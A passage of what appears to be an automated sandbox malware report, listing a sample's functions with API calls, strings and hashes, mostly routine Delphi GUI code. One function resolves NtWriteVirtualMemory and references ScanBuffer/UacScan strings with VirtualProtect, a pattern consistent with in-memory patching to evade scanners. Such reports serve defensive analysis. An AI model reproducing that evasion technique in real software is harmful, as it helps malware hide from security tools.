Opcode Fuzzy Hash: b0d1f087eee48ef5c0b8481f3c9d1b1c113b6f1c847f54e18f1e60871950e3e1
Instruction Fuzzy Hash: F8115AB0640301BFF7149FA5FC82B26FBA9EF58310F108065B9458BBA0E7B09D41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D3DD40 Relevance: 18.1, APIs: 12, Instructions: 142COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 02D3DD5B
GetWindowRect.USER32(00000000,?), ref: 02D3DD76
OffsetRect.USER32(?,?,?), ref: 02D3DD8B
GetWindowDC.USER32(00000000,?,?,?,00000000,?), ref: 02D3DD99
GetWindowLongA.USER32(00000000,000000F0), ref: 02D3DDCA
GetSystemMetrics.USER32(00000002), ref: 02D3DDDF
GetSystemMetrics.USER32(00000003), ref: 02D3DDE8
InflateRect.USER32(?,000000FE,000000FE), ref: 02D3DDF7
GetSysColorBrush.USER32(0000000F), ref: 02D3DE24
FillRect.USER32(?,?,00000000), ref: 02D3DE32
ExcludeClipRect.GDI32(?,?,?,?,?,00000000,02D3DE9B,?,00000000,?,?,?,00000000,?), ref: 02D3DE57
ReleaseDC.USER32(00000000,?), ref: 02D3DE95

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
String ID:
API String ID: 19621357-0
Opcode ID: aada626fe8378f8a49c2de715397d00e9aa843d0e648833f9eef0009c0965613
Instruction ID: e071eb6e3f427b736b3f48d74d8c4e8bcec644d439fb553e8a4c203bc95ad11e
Opcode Fuzzy Hash: aada626fe8378f8a49c2de715397d00e9aa843d0e648833f9eef0009c0965613
Instruction Fuzzy Hash: 0541D671A00219ABDB11EAE8DD41EEFB7BEEF49310F100151F914F7690CA71AE458A60

Uniqueness

Uniqueness Score: -1.00%

Function 02D125CC Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02D1296A

Strings

String, xrefs: 02D1283D
, xrefs: 02D128B0
An unexpected memory leak has occurred. , xrefs: 02D1272C
Unknown, xrefs: 02D12828
Unexpected Memory Leak, xrefs: 02D1295C
7, xrefs: 02D1273D
The unexpected small block leaks are:, xrefs: 02D127A3
bytes: , xrefs: 02D127F9
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02D128E5

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 959aff5780196990c6e39063c92dd49972935393129b5d1f3b80cbd3def202ce
Instruction ID: d50d8461860483b2e89aad80aadd4bdda5d4d67c94f1b12029653561a60162a2
Opcode Fuzzy Hash: 959aff5780196990c6e39063c92dd49972935393129b5d1f3b80cbd3def202ce
Instruction Fuzzy Hash: 42A1F530A042B49FDF21AA2CE888B99B7F5EB09314F1041E5E8499B785CB768DC5CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02D3B240 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 02D3B279
GetSystemMetrics.USER32(00000000), ref: 02D3B29E
GetSystemMetrics.USER32(00000001), ref: 02D3B2A9
GetClipBox.GDI32(?,?), ref: 02D3B2BB
GetDCOrgEx.GDI32(?,?), ref: 02D3B2C8
OffsetRect.USER32(?,?,?), ref: 02D3B2E1
IntersectRect.USER32(?,?,?), ref: 02D3B2F2
IntersectRect.USER32(?,?,?), ref: 02D3B308

Part of subcall function 02D3AC98: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 02D3AD17

Strings

EnumDisplayMonitors, xrefs: 02D3B258

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: 46c1f199f5c7371d54b7af9f6295b7fad04859af872e859e71377fb67a943fbd
Instruction ID: 6beb2c868c17be8886e59707c152fe596b7d0ac07f4b4d7c8a41a9a10a2968b9
Opcode Fuzzy Hash: 46c1f199f5c7371d54b7af9f6295b7fad04859af872e859e71377fb67a943fbd
Instruction Fuzzy Hash: 6F31FB76E41219AFDB12DEA4D844EEFB7BDEB49208F044526E965E3300E734DD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D68C90 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 02D68CB0
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02D68CC7
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 02D68CCD
IsBadReadPtr.KERNEL32(?,00000004), ref: 02D68D5B
IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02D68D67
IsBadReadPtr.KERNEL32(?,00000014), ref: 02D68D7B

Strings

C:\Windows\System32\KernelBase.dll, xrefs: 02D68CC2
LoadLibraryExA, xrefs: 02D68CBD

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Read$AddressHandleModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 1061262613-1650066521
Opcode ID: 2107f9a29fa4831ec0c5c04c599ab626583c8c3a9b256aec477366b17a47185a
Instruction ID: 6fc61f287d7719f0e9dd7139498342560200d221ae56017196e51db118bb879f
Opcode Fuzzy Hash: 2107f9a29fa4831ec0c5c04c599ab626583c8c3a9b256aec477366b17a47185a
Instruction Fuzzy Hash: 28315971A40204BFEB20DB68DD89FAA77A9AF24324F004150EA14EB781D370ED54DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 02D4FE98 Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02D4FEE3
CreateCompatibleBitmap.GDI32(00000000,?), ref: 02D4FF07
ReleaseDC.USER32(00000000,00000000), ref: 02D4FF12
CreateCompatibleDC.GDI32(00000000), ref: 02D4FF19
SelectObject.GDI32(00000000,?), ref: 02D4FF29
BeginPaint.USER32(00000000,?,00000000,02D4FFEA,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 02D4FF4B
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 02D4FFA7
EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 02D4FFB8
SelectObject.GDI32(00000000,?), ref: 02D4FFD2
DeleteDC.GDI32(00000000), ref: 02D4FFDB
DeleteObject.GDI32(?), ref: 02D4FFE4

Part of subcall function 02D4F8A0: BeginPaint.USER32(00000000,?), ref: 02D4F8CB
Part of subcall function 02D4F8A0: EndPaint.USER32(00000000,?,02D4FA06), ref: 02D4F9F9

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
String ID:
API String ID: 3867285559-0
Opcode ID: 16a4a637d264860cd17f4b49af2ef5f3f77184f6192848afd769271423389b4b
Instruction ID: 6d4d45b4e333ee31292ff9036c0bb91a262d55531a19b061f2b461e7fe64d180
Opcode Fuzzy Hash: 16a4a637d264860cd17f4b49af2ef5f3f77184f6192848afd769271423389b4b
Instruction Fuzzy Hash: E141E875B00244AFDB10EBA8DC84B9EB7FEEB49700F104469B909DB791DA75ED05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D46E30 Relevance: 16.6, APIs: 11, Instructions: 91COMMON

Download Yara Rule

APIs

IsWindowUnicode.USER32(?), ref: 02D46E4A
SetWindowLongW.USER32(?,000000FC,?), ref: 02D46E65
GetWindowLongW.USER32(?,000000F0), ref: 02D46E70
GetWindowLongW.USER32(?,000000F4), ref: 02D46E82
SetWindowLongW.USER32(?,000000F4,?), ref: 02D46E95
SetWindowLongA.USER32(?,000000FC,?), ref: 02D46EAE
GetWindowLongA.USER32(?,000000F0), ref: 02D46EB9
GetWindowLongA.USER32(?,000000F4), ref: 02D46ECB
SetWindowLongA.USER32(?,000000F4,?), ref: 02D46EDE
SetPropA.USER32(?,00000000,00000000), ref: 02D46EF5
SetPropA.USER32(?,00000000,00000000), ref: 02D46F0C

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$Long$Prop$Unicode
String ID:
API String ID: 1693715928-0
Opcode ID: d429d95c9b2375d62008f0c9a99ac7050d6c8b9ae9b63e3f267b9d8bd0c66507
Instruction ID: 40f51d64606c5b75a5ad00a123002fe04ddeddd3a144aaf5090a7a74e4372b00
Opcode Fuzzy Hash: d429d95c9b2375d62008f0c9a99ac7050d6c8b9ae9b63e3f267b9d8bd0c66507
Instruction Fuzzy Hash: D831C675544248BBEB00DF98E884EEA77EDEB09368F148651BD28CB3A0D734DD50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D6ADAC Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 420libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,02DAD350,02D6B410,OpenSession,02DAD350,02D6B410,ScanBuffer,02DAD350,02D6B410,00000000,02D6B3F8), ref: 02D6AEF3
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D6AEF9

Part of subcall function 02D2FD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FD78
Part of subcall function 02D2FD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FD86
Part of subcall function 02D2FD40: GetProcAddress.KERNEL32(74B00000,00000000), ref: 02D2FD9F
Part of subcall function 02D2FD40: VirtualProtect.KERNEL32(02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDBA
Part of subcall function 02D2FD40: GetCurrentProcess.KERNEL32(00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDD7
Part of subcall function 02D2FD40: FlushInstructionCache.KERNEL32(00000000,00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDDD
Part of subcall function 02D2FD40: FreeLibrary.KERNEL32(74B00000,00000000,00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDE8

Strings

C:\Windows\System32\ntdll.dll, xrefs: 02D6AEEE
ScanString, xrefs: 02D6B01E
OpenSession, xrefs: 02D6AE3E, 02D6AF66, 02D6B270, 02D6B2FD
NtWriteVirtualMemory, xrefs: 02D6AEE9
ScanBuffer, xrefs: 02D6ADE5, 02D6AFBF, 02D6B0E2, 02D6B1FF, 02D6B36E
UacInitialize, xrefs: 02D6AF0D, 02D6B077, 02D6B18E
UacScan, xrefs: 02D6AE97

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressHandleLibraryModuleProc$CacheCurrentFlushFreeInstructionLoadProcessProtectVirtual
String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
API String ID: 227204648-4174081549
Opcode ID: 8ab2792153c0b416f182e5b03e5ce4a052303e566f7eb28c450e919b2f0eebc5
Instruction ID: d9aa07fcc2f750942328ad47cb55996ea1605b7880aa223f0f39e45bd2f3136f
Opcode Fuzzy Hash: 8ab2792153c0b416f182e5b03e5ce4a052303e566f7eb28c450e919b2f0eebc5
Instruction Fuzzy Hash: 24F1DF31B0011DABDB14EBA4E984FDEB3BAEF54308F1544B6E005EBB15DA30AE458F65

Uniqueness

Uniqueness Score: -1.00%

Function 02D4FA38 Relevance: 15.2, APIs: 10, Instructions: 227windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(00000000,?), ref: 02D4FB50
SaveDC.GDI32(00000000), ref: 02D4FB73
IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 02D4FBB3
RestoreDC.GDI32(00000000,00000000), ref: 02D4FBDF

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Rect$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 1976014923-0
Opcode ID: 2ed113443bacfc2cb2a841b5ed53f288aa23742ee2b7365d771223c3a61b15bf
Instruction ID: bebb6cf14370930e2b75d79415dc36480da005c849f3f381199f13135caec4e6
Opcode Fuzzy Hash: 2ed113443bacfc2cb2a841b5ed53f288aa23742ee2b7365d771223c3a61b15bf
Instruction Fuzzy Hash: F491E770A042499FDB14DFA8C484FAEBBF9EF09304F144095E944AB766DB35ED44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D5F0A4 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 02D5F0EF
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 02D5F10D
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 02D5F11A
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 02D5F127
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 02D5F134
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 02D5F141
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 02D5F14E
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 02D5F15B
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 02D5F179
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 02D5F195

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: c6177b1c7bded98471eadc7084a08f04c42fab33cf565289a5959c21c7e5cd62
Instruction ID: 605cdd0a499f4a53997177ece7b62e042f5688464fa70acc42830028a25e6ff2
Opcode Fuzzy Hash: c6177b1c7bded98471eadc7084a08f04c42fab33cf565289a5959c21c7e5cd62
Instruction Fuzzy Hash: A3211D70385304BAEB20DB24DD8DF697BDD9B05718F048490BA486FBD2C7F4ED448A64

Uniqueness

Uniqueness Score: -1.00%

Function 02D125CA Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

, xrefs: 02D128B0
An unexpected memory leak has occurred. , xrefs: 02D1272C
Unexpected Memory Leak, xrefs: 02D1295C
7, xrefs: 02D1273D
The unexpected small block leaks are:, xrefs: 02D127A3
bytes: , xrefs: 02D127F9
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02D128E5

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: f9d70f4759fbfa28a86456d2c3348a96ccd8ec3fce0c257c9661121e94e27d25
Instruction ID: 5457331e95bb111ad410c59b623c2ac2ee576a968d7fe7ae36d65e66579d7263
Opcode Fuzzy Hash: f9d70f4759fbfa28a86456d2c3348a96ccd8ec3fce0c257c9661121e94e27d25
Instruction Fuzzy Hash: D271D430A042B89FDF21AA2CE888BD9BAF5EB09710F1041E5D849DB785DB768DC5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02D4A11C Relevance: 13.7, APIs: 9, Instructions: 154COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 02D4A157
MulDiv.KERNEL32(?,?,?), ref: 02D4A171
MulDiv.KERNEL32(?,?,?), ref: 02D4A19F
MulDiv.KERNEL32(?,?,?), ref: 02D4A1B5
MulDiv.KERNEL32(?,?,?), ref: 02D4A1ED
MulDiv.KERNEL32(?,?,?), ref: 02D4A205

Part of subcall function 02D324F0: MulDiv.KERNEL32(00000000,00000048,?), ref: 02D32501

MulDiv.KERNEL32(?), ref: 02D4A25C
MulDiv.KERNEL32(?), ref: 02D4A286
MulDiv.KERNEL32(00000000), ref: 02D4A2AC

Part of subcall function 02D3250C: MulDiv.KERNEL32(00000000,?,00000048), ref: 02D32519

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198e3460bbc8c7f21fca6a369c6295dde57bbae6b57873396b2d69b5ebbb0b85
Instruction ID: 94c12d5f42be5ba83661cc15dd1e18336c4e798282072c6ca8eab2c4462abd4d
Opcode Fuzzy Hash: 198e3460bbc8c7f21fca6a369c6295dde57bbae6b57873396b2d69b5ebbb0b85
Instruction Fuzzy Hash: 5B513A70689790AFD320DB79C894B6AB7EAAF49304F048C1DB9D5C7752CA75EC40DB21

Uniqueness

Uniqueness Score: -1.00%

Function 02D62A40 Relevance: 13.6, APIs: 9, Instructions: 132windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 02D2E98C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 02D2E9AA

GetClassInfoA.USER32(02D10000,02D626DC,?), ref: 02D62A9F
RegisterClassA.USER32(02D7B650), ref: 02D62AB7

Part of subcall function 02D1669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 02D166CE

SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 02D62B53
SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 02D62B75
SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 02D62B88
GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,02D5998C), ref: 02D62B93
DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,02D5998C), ref: 02D62BA2
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,02D5998C), ref: 02D62BAF
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,02D5998C), ref: 02D62BC6

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID:
API String ID: 2103932818-0
Opcode ID: 0d6c90313cc2ce8ef6ba95b301371845b1efb617efcfa71944762b5732b37d7e
Instruction ID: 094f4d75435cf37477b942f2c239e1bdaa070f0ad1515e80a7bbde46415c734e
Opcode Fuzzy Hash: 0d6c90313cc2ce8ef6ba95b301371845b1efb617efcfa71944762b5732b37d7e
Instruction Fuzzy Hash: 27413A70A80241AFEB10EF68EC85FAA77A9EB05714F144961FA00DF796D7A5EC44CB70

Uniqueness

Uniqueness Score: -1.00%

Function 02D4B0A0 Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 02D4B0D7
GetDCEx.USER32(?,00000000,00000402), ref: 02D4B0EA
SelectObject.GDI32(?,00000000), ref: 02D4B10D
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 02D4B133
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 02D4B155
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 02D4B174
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 02D4B18E
SelectObject.GDI32(?,?), ref: 02D4B19B
ReleaseDC.USER32(?,?), ref: 02D4B1B5

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: ObjectSelect$DesktopReleaseWindow
String ID:
API String ID: 1187665388-0
Opcode ID: d0380e5e07902f2acedf48f78b4eeef2c92e4c782be5cd3158cbdab9cd62becd
Instruction ID: 04cea835357f2cb5c7f8e401b9e4f041be2cb2bb5158a0a89cf4e5f5398db351
Opcode Fuzzy Hash: d0380e5e07902f2acedf48f78b4eeef2c92e4c782be5cd3158cbdab9cd62becd
Instruction Fuzzy Hash: 1231C5B6A00219BFDB01DEADDC89DAFBBBDEF09704B414465B514E7640C675ED048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D1CFDC Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02D1D2A7,?,?,00000000,00000000), ref: 02D1D012

Part of subcall function 02D1B8D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D1B8F2

Strings

:mm, xrefs: 02D1D245
:mm:ss, xrefs: 02D1D262
AMPM, xrefs: 02D1D226
mmmm d, yyyy, xrefs: 02D1D10E
m/d/yy, xrefs: 02D1D0E1
AMPM , xrefs: 02D1D235

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 9bbf0fcf7d4dc82ad7acc80c1fe2225056db200dd6d6f157b22f8b26e1af6c47
Instruction ID: f322dc5d91efa688a204926e115aa183e10096de675e4a1c2b2f32135b4e5320
Opcode Fuzzy Hash: 9bbf0fcf7d4dc82ad7acc80c1fe2225056db200dd6d6f157b22f8b26e1af6c47
Instruction Fuzzy Hash: CC61EB34B14148BBDB04EBB8F890A9F77B7EB88300F549536E1119BB45DA34DD069BA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D4E538 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(?,?,?), ref: 02D4E5FC
UnregisterClassA.USER32(?,?), ref: 02D4E624
RegisterClassA.USER32(?), ref: 02D4E63A
GetWindowLongA.USER32(00000000,000000F0), ref: 02D4E676
